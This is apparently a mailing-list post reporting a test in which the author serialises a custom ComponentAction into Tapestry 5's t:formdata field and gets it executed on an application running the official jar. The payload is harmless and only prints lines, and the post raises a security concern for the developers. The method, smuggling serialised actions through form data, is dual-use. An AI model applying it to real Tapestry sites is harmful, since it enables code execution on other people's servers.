Hi,
These days I always think of security of t:formdata, just now I have a test
to hack the t:formdata and find there is some serious damages.
1. First I change source code of Form component and store a component action
in Form and build my own tapestry-core.jar.
static final ComponentAction<Form> TEST_ACTION = new
ComponentAction<Form>()
{
private static final long serialVersionUID = 0L;
public void execute(Form component)
{
for (int i = 0; i < 1000; i++) {
System.out.println("-----run " + i);
}
}
@Override
public String toString()
{
return "TEST_ACTION";
}
};
2. Jetty:run the application with my own jar and access one page
(/login) that contains form, then get the t:formdata from html source code.
3. Revert offical jar, and new a AbstractIntegrationTestSuite test case:
open("login");
type("t:formdata", copy the form data from 2nd);
clickAndWait(submit);
Test result: I can see "-----run 0" to "-----run 1000" loged.
So in my understanding, doesn't it mean that website based on tapestry5 is
not very secured and can be attacked by any experienced t5 programmer?
Thanks,
DH
